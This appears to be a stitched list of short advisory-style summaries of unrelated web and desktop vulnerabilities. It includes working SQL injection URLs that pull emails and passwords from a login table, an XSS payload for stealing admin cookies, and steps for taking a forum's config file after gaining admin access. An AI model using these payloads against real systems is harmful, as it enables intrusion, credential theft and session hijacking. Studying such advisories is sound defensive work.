The CMNC-200 IP Camera ActiveX control identified by CLSID {DD01C8CA-5DA0-4B01-9603-B7194E561D32} is vulnerable to a stack overflow in the first argument of the connect method. The vulnerability can be used to control the EIP register, allowing reliable exploitation. The example code below triggers the vulnerability.
This vulnerability can be found by viewing the component in the Joomla administrator backend. Examples: administrator/index.php?option=com_jsupport&task=listTickets&alpha=[SQL Injection] and administrator/index.php?option=com_jsupport&task=listFaqs&alpha=[SQL Injection]
The component allows you to create and submit tickets. The tickets can be viewed on the website and in the admin panel. It is possible to inject arbitrary HTML and JS/VBS code into the title field of the ticket. If someone else views the ticket list, the code is executed in the visitor's browser. This vulnerability is considered critical since the tickets are also displayed in the administrator backend of Joomla. As soon as a user with extended privileges views the ticket list in the admin backend, the code is executed and damage can be caused.
After using the exploit to get the admin account, the user can go to http://lolcathost/wbb/acp/avatar.php?action=readfolder and import acp/lib. Then, they can download a backup from http://lolcathost/wbb/acp/avatar.php?action=backup. After that, they can go to http://lolcathost/wbb/acp/avatar.php?action=view and search for config.inc.php. After they know the name (for example avatar-17.php), they can go to the zip archive and open avatar-17.php to get the config.inc.php in plaintext.
This exploit uses a combination of null bytes and a loop to cause a denial of service in Mozilla Firefox versions 3.6.12 and below. The exploit writes a series of null bytes and then a loop that writes a large number of 'a' characters and then the contents of the body tag. This causes the browser to crash.
Input passed via the 'specific' parameter to newsroom.asp is not properly sanitised before being used in a SQL query. An attacker can exploit this vulnerability to inject arbitrary SQL commands and gain access to sensitive information from the database. Proof of concept: http://server/newsroom.asp?specific=-1%20UNION%20ALL%20SELECT%20null,(select%20top%201%20chr(126)%2bchr(39)%2bcstr(email)%2bchr(39)%2bchr(126)%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20tbllogins%20order%20by%201)%20t%20order%20by%201%20desc)t),null,null,null,null,null%20from%20tbllogins and http://server/newsroom.asp?specific=-1%20UNION%20ALL%20SELECT%20null,(select%20top%201%20chr(126)%2bchr(39)%2bcstr(pword)%2bchr(39)%2bchr(126)%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20tbllogins%20order%20by%201)%20t%20order%20by%201%20desc)t),null,null,null,null,null%20from%20tbllogins
MetInfo 3.0 source code disclosure vulnerability: an attacker can exploit this vulnerability by sending a crafted request to the vulnerable application. XSS vulnerability: an attacker can exploit this vulnerability by sending a crafted request to the vulnerable application containing malicious JavaScript code.
VbsEdit v4.7.2.0 is vulnerable to a buffer overflow when a maliciously crafted .vbs file is opened. This can be exploited to execute arbitrary code by tricking a user into opening a specially crafted .vbs file.
This exploit targets a buffer overflow vulnerability in Visual MP3 Splitter & Joiner 6.1. It is triggered when a specially crafted .wav file is opened in the application; the application crashes when the Play button is pressed.
XT:Commerce is prone to a (permanent) XSS. An attacker needs to create an account, inject JavaScript into the 'street' field (e.g. '><script>alert(document.cookie)</script>) and place an order. When the administrator opens the order in the backend of the shop, the JavaScript will be executed. By obtaining the admin's cookie, the attacker gets the session ID and user ID. If binding the session to the client IP address is not enabled, the attacker will be able to take over the admin session.